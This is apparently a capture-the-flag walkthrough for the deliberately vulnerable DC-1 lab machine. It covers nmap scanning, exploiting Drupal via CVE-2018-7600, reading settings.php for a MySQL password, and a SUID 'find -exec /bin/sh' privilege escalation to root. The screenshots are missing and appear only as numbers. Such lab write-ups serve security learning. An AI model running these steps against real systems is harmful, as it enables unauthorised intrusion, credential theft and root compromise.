you can download here: http://www.five86.com/downloads/DC-1.zip

use nmap or netdiscover to locate the target

1
nmap -Pn 192.168.227.0/24:

1

check its port 80:

2

a drupal website, try droopescan

3

version 7.2X, try drupwn, 3 exploits available, succeeded on CVE-2018-7600

4

now I have a shell with privelege of www-data, next step is try to escalate privelege.
get a connectback shell, and make it an interactive shell:

5

read flag1.txt:

6

seems like I need to connect to its database, cat .sites/default/settings.php

7

1
2
3
mysql -u dbuser -pR0ck3t
show databases;
show tables;

seems nothing special, I can try to reset the users’ password and login on to the website to check for anything special
too lazy, just check entries from mysql

1
select * from node;

8

another flag

1
select * from field_data_body where entity_id = 2;

9

obviously it’s about suid thing

1
2
find / -user root -perm -4000 -print 2>/dev/null
look for executable file with suid set

10

find can be used to escalate privelege

1
2
echo asdf > asdf #required, find will only execute the command if it finds the file.
find asdf -exec "whoami" \;

11

ok, gain a root shell

1
find asdf -exec "/bin/sh" \;

12

get the final flag

13